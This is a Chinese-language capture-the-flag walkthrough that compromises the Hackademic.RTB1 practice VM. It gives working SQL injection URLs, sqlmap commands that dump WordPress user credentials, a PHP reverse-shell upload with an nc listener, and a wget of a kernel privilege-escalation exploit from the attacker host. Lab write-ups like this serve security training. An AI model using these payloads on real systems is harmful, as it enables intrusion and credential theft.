第二次打靶

靶机介绍：

1）靶机名称：2-Free-Hackademic.RTB1
2）靶机链接：
步骤：链接：https://pan.baidu.com/s/1IMWhKd3h8sDcPelzXXhxKg  提取码：o5k0
打靶过程：

1）启动靶机，选择网络模式为仅主机模式，由此可确定靶机地址段为192.168.56.0/24


2）通过nmap进行扫描，扫描192.168.56.0/24存活主机

1. #nmap -sP 192.168.56.0/24

复制代码

通过扫描，确认靶机地址为192.168.56.104
3）使用nmap扫描该IP开放的所有端口

1. #nmap -p- 192.168.56.104

复制代码

扫描发现，开放80端口
4）对每80端口进行工作服务的指纹扫描（应用服务版本信息等）

1. #nmap -p80 -sV -sC 192.168.56.104

复制代码

5)访问web页面

1. http://192.168.56.104/

复制代码

6）点击标题“Hackademic_RTB1”，出现如下页面

7）点击Got root，发现地址栏参数发生变化，http://192.168.56.104/Hackademic_RTB1/?p=9

8）对该URL进行SQL注入测试，判断是否存在SQL注入漏洞

1. http://192.168.56.104/Hackademic_RTB1/?p=9
2. http://192.168.56.104/Hackademic_RTB1/?p=9'

复制代码

页面无明显变化，说明此处无SQL注入漏洞
9）点击上述页面最下方的“Uncategorized”发现，URL中的参数发生了变化

10）对上述URL进行SQL注入测试,页面发生了变化，说明存在SQL注入漏洞

1. http://192.168.56.104/Hackademic_RTB1/?cat=1
2. http://192.168.56.104/Hackademic_RTB1/?cat=1'

复制代码

11）手动测试

1. http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1
2. http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2
3. http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 5
4. http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 6
5. http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,2,3,4,5
6. http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,databases(),3,4,5
7. http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
8. http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='wp_users'

复制代码

12）SQLmap自动注入
①检测数据库类型，证明是否存在sql注入漏洞

1. # sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --batch

复制代码

②获取数据库

1. # sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  --dbs --batch

复制代码

③获取wordpress数据库中的数据表

1. #sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" --tables --batch

复制代码

④获取wp_users表中的所有字段

1. #sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" -T "wp_users" --columns --batch

复制代码

⑤获取user_login和user_pass中的数据

1. #sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" -T "wp_users" -C user_login,user_pass --dump --batch

复制代码

13）最后一个用户JohnSmith的user_pass通过md5进行了加密，可以对其进行破解

1. https://md5.gromweb.com/

复制代码

14）通过dirserach对网站目录进行扫描，查看是否可以扫描出web站点的后台管理页面

1. # dirsearch -u "http://192.168.56.104"
2. # dirsearch -u "http://192.168.56.104/Hackademic_RTB1/"

复制代码

15）通过访问扫描出的目录，发现了web站点后台地址

1. http://192.168.56.104/Hackademic_RTB1/wp-admin/

复制代码

16）通过SQL注入出来的用户“GeorgeMiller”登入后台后，配置其可以上传的文件类型有php，并点击更新配置

17）上一步配置完成，后生成一个upload选线，运行上传PHP文件

18）下载PHP反弹shell脚本文件，并在upLoad页面进行上传

1. #php反弹shell脚本文件下载地址
2. https://pentestmonkey.net/tools/web-shells/php-reverse-shell

复制代码

下载完成后，设置脚本中IP地址为kali主机地址（192.168.56.103）


上传成功后，返回如下页面及地址：href='/Hackademic_RTB1/wp-content/reverse.php

19）在Kali主机通过nc监听脚本中设置的端口（1234），并在浏览器访问刚才上传的php脚本文件

1. #nc -lvvp 1234
2. 浏览器访问：http://192.168.56.104/Hackademic_RTB1/wp-content/reverse.php

复制代码

此时已经成功反弹shell
20）查看当前用户是否具有sudo权限，提示必须要有一个控制终端

1. $sudo -s

复制代码

21）查看当前主机内核为2.6.31

1. $uname -a

复制代码

22）在kali主机搜索2.6.31内核对应的本地权限提示脚本

1. #searchsploit 2.6.3|grep -i "local privilege escalation"

复制代码

23）将选定的提权脚本复制到Kali本机站点目录下，并启动httpd服务

1. # cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html
2. # systemctl restart apache2

复制代码

24）在反弹shell成功后的主机，将上述脚本下载下来

1. $ cd /tmp
2. $ wget http://192.168.56.103/15285.c

复制代码

25）通过gcc编译

1. $ gcc -o exp 15285.c
2. $ ls
3. $ chmod +x exp

复制代码

26）获取flag

1. #cd /root
2. #ls
3. #cat key.txt

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！